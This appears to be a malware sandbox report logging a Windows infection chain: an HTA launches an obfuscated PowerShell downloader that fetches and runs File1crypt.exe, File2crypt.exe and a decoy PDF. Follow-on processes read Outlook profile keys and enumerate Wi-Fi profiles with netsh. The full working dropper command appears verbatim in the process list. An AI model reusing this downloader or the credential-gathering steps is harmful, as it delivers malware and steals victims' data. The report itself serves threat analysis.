PID 4468 wrote to memory of 1316 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
PID 4468 wrote to memory of 1316 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
PID 4468 wrote to memory of 1316 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
PID 4468 wrote to memory of 2236 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\File1crypt.exe
PID 4468 wrote to memory of 2236 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\File1crypt.exe
PID 4468 wrote to memory of 2236 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\File1crypt.exe
PID 4468 wrote to memory of 3396 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\File2crypt.exe
PID 4468 wrote to memory of 3396 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\File2crypt.exe
PID 4468 wrote to memory of 3396 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\File2crypt.exe
PID 1316 wrote to memory of 1400 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1316 wrote to memory of 1400 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1316 wrote to memory of 1400 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 3312 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 1700 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 1700 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 1700 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 1700 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 1700 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1400 wrote to memory of 1700 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\File2crypt.exe N/A

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Files.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function bTBrpbwC($sLUJNuBgfBfA, $DKUZcAdbQOceyyJA){[IO.File]::WriteAllBytes($sLUJNuBgfBfA, $DKUZcAdbQOceyyJA)};function qMgSdvYIRRUSjZ($sLUJNuBgfBfA){if($sLUJNuBgfBfA.EndsWith((HEiDtQybOoyVmdi @(70951,71005,71013,71013))) -eq $True){rundll32.exe $sLUJNuBgfBfA }elseif($sLUJNuBgfBfA.EndsWith((HEiDtQybOoyVmdi @(70951,71017,71020,70954))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $sLUJNuBgfBfA}elseif($sLUJNuBgfBfA.EndsWith((HEiDtQybOoyVmdi @(70951,71014,71020,71010))) -eq $True){misexec /qn /i $sLUJNuBgfBfA}else{Start-Process $sLUJNuBgfBfA}};function qKOlApTVNWImMHKgKrr($HXvvEsCPxrUIJvZa){$HFhjjojUglemTDI = New-Object (HEiDtQybOoyVmdi @(70983,71006,71021,70951,70992,71006,71003,70972,71013,71010,71006,71015,71021));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$DKUZcAdbQOceyyJA = $HFhjjojUglemTDI.DownloadData($HXvvEsCPxrUIJvZa);return $DKUZcAdbQOceyyJA};function HEiDtQybOoyVmdi($neuW){$LuPJsyaVetOy=70905;$rnhDacIHSobOT=$Null;foreach($OQvtigeOZOgrvp in $neuW){$rnhDacIHSobOT+=[char]($OQvtigeOZOgrvp-$LuPJsyaVetOy)};return $rnhDacIHSobOT};function kISEaSmnymA(){$iKWnDWTBqeifbvN = $env:AppData + '\';$MdErWExzJnRFtj = $iKWnDWTBqeifbvN + 'Document.pdf';If(Test-Path -Path $MdErWExzJnRFtj){Invoke-Item $MdErWExzJnRFtj;}Else{ $QXivrbIwhnWacVVIbm = qKOlApTVNWImMHKgKrr (HEiDtQybOoyVmdi @(71009,71021,71021,71017,71020,70963,70952,70952,71014,71002,71008,71010,71004,70951,71017,71016,71010,71020,71016,71015,71021,71016,71016,71013,71027,70951,71004,71016,71014,70952,70973,71016,71004,71022,71014,71006,71015,71021,70951,71017,71005,71007));bTBrpbwC $MdErWExzJnRFtj $QXivrbIwhnWacVVIbm;Invoke-Item $MdErWExzJnRFtj;};$BzjEeQAv = $iKWnDWTBqeifbvN + 'File1crypt.exe'; if (Test-Path -Path $BzjEeQAv){qMgSdvYIRRUSjZ $BzjEeQAv;}Else{ $ELYbsewlypYz = qKOlApTVNWImMHKgKrr (HEiDtQybOoyVmdi @(71009,71021,71021,71017,71020,70963,70952,70952,71014,71002,71008,71010,71004,70951,71017,71016,71010,71020,71016,71015,71021,71016,71016,71013,71027,70951,71004,71016,71014,70952,70975,71010,71013,71006,70954,71004,71019,71026,71017,71021,70951,71006,71025,71006));bTBrpbwC $BzjEeQAv $ELYbsewlypYz;qMgSdvYIRRUSjZ $BzjEeQAv;}$kYEycGaL = $iKWnDWTBqeifbvN + 'File2crypt.exe'; if (Test-Path -Path $kYEycGaL){qMgSdvYIRRUSjZ $kYEycGaL;}Else{ $sEFREXgUWGLv = qKOlApTVNWImMHKgKrr (HEiDtQybOoyVmdi @(71009,71021,71021,71017,71020,70963,70952,70952,71014,71002,71008,71010,71004,70951,71017,71016,71010,71020,71016,71015,71021,71016,71016,71013,71027,70951,71004,71016,71014,70952,70975,71010,71013,71006,70955,71004,71019,71026,71017,71021,70951,71006,71025,71006));bTBrpbwC $kYEycGaL $sEFREXgUWGLv;qMgSdvYIRRUSjZ $kYEycGaL;};;;;}kISEaSmnymA;

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\Document.pdf"

C:\Users\Admin\AppData\Roaming\File2crypt.exe

"C:\Users\Admin\AppData\Roaming\File2crypt.exe"

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=7976D2701938C143CEEE98EB0DBD760E --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=7976D2701938C143CEEE98EB0DBD760E --renderer-client-id=2 --mojo-platform-channel-handle=1664 --allow-no-sandbox-job /prefetch:1

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=98176EE9CEE33A0427A03A4DE26D771B --mojo-platform-channel-handle=1840 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=31B3ACEAC2102F4B7E0CEBE272B054CE --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=31B3ACEAC2102F4B7E0CEBE272B054CE --renderer-client-id=4 --mojo-platform-channel-handle=2160 --allow-no-sandbox-job /prefetch:1

C:\Users\Admin\AppData\Roaming\File1crypt.exe

"C:\Users\Admin\AppData\Roaming\File1crypt.exe"

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=5E53667CAD71A60515A0E3471FB2C312 --mojo-platform-channel-handle=2560 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=65AE344A690A01991423F40BD6EDF808 --mojo-platform-channel-handle=2008 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=BC1DB1F616B341ACA525D2BE32A5071A --mojo-platform-channel-handle=2108 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Windows\System32\sihclient.exe

C:\Windows\System32\sihclient.exe /cv apyXpiSGQEezF0sqZFyx6g.0.2

C:\Users\Admin\AppData\Roaming\File1crypt.exe

C:\Users\Admin\AppData\Roaming\File1crypt.exe

C:\Users\Admin\AppData\Roaming\File2crypt.exe

C:\Users\Admin\AppData\Roaming\File2crypt.exe

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\findstr.exe

findstr All

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\SysWOW64\netsh.exe

netsh wlan show profile

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid

Network

Country Destination Domain Proto
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 12.179.17.96.in-addr.arpa udp
